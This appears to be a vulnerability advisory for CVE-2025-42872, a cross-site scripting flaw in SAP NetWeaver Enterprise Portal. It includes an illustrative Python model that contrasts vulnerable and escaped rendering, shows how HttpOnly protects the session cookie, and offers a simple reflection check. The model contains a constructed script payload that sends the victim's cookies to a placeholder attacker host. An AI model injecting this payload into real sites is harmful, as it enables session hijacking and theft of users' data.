XSS in SAP NetWeaver Enterprise Portal (CVE-2025-42872) - Cookie Theft
CVE-2025-42872 Published on December 9, 2025
Cross-Site Scripting (XSS) vulnerability in SAP NetWeaver Enterprise Portal
Due to a Cross-Site Scripting (XSS) vulnerability in SAP NetWeaver Enterprise Portal, an unauthenticated attacker could inject malicious scripts that execute in the context of other users' browsers, allowing the attacker to steal session cookies, tokens, and other sensitive information. The vulnerability is rated as having a low impact on confidentiality and integrity and no impact on availability. Note for defenders: injected script can only read a session cookie through document.cookie if that cookie was set without the HttpOnly flag; with HttpOnly set, the script can still issue requests as the victim, so output encoding on the affected page remains the actual fix.
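To make the cookie-theft scenario concrete, the following added example (not code from SAP or from this advisory) models a hypothetical portal search page that reflects a query parameter into HTML. It shows the vulnerable rendering beside the hardened one, a constructed exfiltration payload, and why the HttpOnly attribute on the session cookie limits what the payload can read. The URL path, parameter name and domains are assumptions chosen for illustration.

```python
import html
from urllib.parse import parse_qs, quote, urlparse

# Constructed attacker payload: sends document.cookie to a host the attacker
# controls. attacker.example is a reserved example domain, not a real server.
COOKIE_THEFT_PAYLOAD = (
    "<script>new Image().src='https://attacker.example/c?'"
    "+encodeURIComponent(document.cookie)</script>"
)

# Hypothetical endpoint; the /irj/ path and the 'q' parameter are assumptions.
SEARCH_URL = "https://portal.example/irj/search?q="


def _query_param(url, name):
    """Extract a single query-string parameter, URL-decoded like a server would."""
    return parse_qs(urlparse(url).query).get(name, [""])[0]


def render_search_vulnerable(url):
    """Vulnerable variant: the reflected value goes into the HTML verbatim."""
    q = _query_param(url, "q")
    return f"<html><body><h1>Results for: {q}</h1></body></html>"


def render_search_fixed(url):
    """Hardened variant: contextual output encoding before the value is reflected.
    html.escape with quote=True neutralises < > & " and ' for an HTML text context."""
    q = _query_param(url, "q")
    return f"<html><body><h1>Results for: {html.escape(q, quote=True)}</h1></body></html>"


def session_cookie_header(session_id, hardened=True):
    """Build the Set-Cookie header for the portal session cookie.
    HttpOnly keeps the value out of document.cookie, Secure restricts it to TLS,
    SameSite=Lax blocks most cross-site sends. Cookie name is an assumption."""
    attrs = [f"JSESSIONID={session_id}", "Path=/"]
    if hardened:
        attrs += ["HttpOnly", "Secure", "SameSite=Lax"]
    return "Set-Cookie: " + "; ".join(attrs)


def cookie_readable_by_script(set_cookie_header):
    """Model the browser rule: document.cookie omits cookies flagged HttpOnly."""
    attrs = {a.strip().lower() for a in set_cookie_header.split(";")}
    return "httponly" not in attrs


def reflected_unescaped(response_body, probe):
    """Minimal reflected-XSS check as a scanner would do it: the probe string
    is considered reflected if it comes back byte-for-byte unmodified."""
    return probe in response_body


if __name__ == "__main__":
    attack_url = SEARCH_URL + quote(COOKIE_THEFT_PAYLOAD)
    print("vulnerable reflects payload:",
          reflected_unescaped(render_search_vulnerable(attack_url), COOKIE_THEFT_PAYLOAD))
    print("fixed reflects payload:   ",
          reflected_unescaped(render_search_fixed(attack_url), COOKIE_THEFT_PAYLOAD))
    print("cookie readable (no HttpOnly):",
          cookie_readable_by_script(session_cookie_header("s1", hardened=False)))
    print("cookie readable (HttpOnly):   ",
          cookie_readable_by_script(session_cookie_header("s1")))
```

The check in reflected_unescaped is deliberately strict: a response that reflects the probe with `<` turned into `&lt;` does not count as vulnerable, which is exactly the difference between the two render functions.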
Vulnerability Analysis
CVE-2025-42872 is exploitable over the network and requires user interaction (a victim must open an attacker-supplied link or page). Attack complexity is considered low. A successful exploit is considered to have a low impact on confidentiality and integrity, and no impact on availability.
Weakness Type
Active Debug Code
The application is deployed to unauthorized actors with debugging code still enabled or active, which can create unintended entry points or expose sensitive information. A common development practice is to add "back door" code specifically designed for debugging or testing purposes that is not intended to be shipped or deployed with the application. These back door entry points create security risks because they are not considered during design or testing and fall outside the expected operating conditions of the application. Note that this classification (CWE-489, Active Debug Code) describes leftover debug or test entry points, whereas the vulnerability description above is that of a classic cross-site scripting flaw (CWE-79); when reviewing an installation, look for the reflected-input path rather than only for debug code.
Products Associated with CVE-2025-42872
Affected Versions
SAP_SE SAP NetWeaver Enterprise Portal Version EP-RUNTIME 7.50 is affected by CVE-2025-42872
Exploit Probability
EPSS (Exploit Prediction Scoring System) scores estimate the probability that a vulnerability will be exploited in the wild within the next 30 days. The percentile shows you how this score compares to all other vulnerabilities.